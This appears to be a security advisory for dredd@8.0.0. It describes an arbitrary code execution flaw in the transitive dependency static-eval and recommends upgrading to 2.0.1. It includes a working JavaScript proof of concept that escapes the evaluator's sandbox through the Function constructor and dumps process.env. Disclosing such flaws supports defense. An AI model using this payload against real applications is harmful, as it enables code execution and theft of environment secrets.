dredd@8.0.0

Vulnerabilities 1 via 1 paths
Dependencies 280
Source npm


high severity

Arbitrary Code Execution

  • Vulnerable module: static-eval
  • Introduced through: dredd-transactions@6.5.1

Detailed paths

  • Introduced through: dredd@8.0.0 dredd-transactions@6.5.1 fury-adapter-swagger@0.23.2 json-schema-faker@0.5.0-rc16 jsonpath@1.0.0 static-eval@2.0.0

Overview

static-eval evaluates statically-analyzable expressions.

Affected versions of this package are vulnerable to Arbitrary Code Execution. They pass untrusted user input directly to the global Function constructor, so an attacker-controlled expression that is parsed and evaluated through the package runs as arbitrary code.

Proof of concept

var evaluate = require('static-eval');
var parse = require('esprima').parse;

// Expression that escapes the "static" sandbox: it reaches the global Function
// constructor via the String.prototype.sub method passed in as x, then uses it
// to compile and run arbitrary JavaScript (here, dumping process.env).
var payload = '(function({x}){return x.constructor})({x:"".sub})("console.log(process.env)")()';
var ast = parse(payload).body[0].expression;

// On a vulnerable static-eval (< 2.0.1) this executes the embedded code;
// the evaluation should have rejected the expression instead.
console.log(evaluate(ast, {x:1}));

Remediation

Upgrade static-eval to version 2.0.1 or higher.

References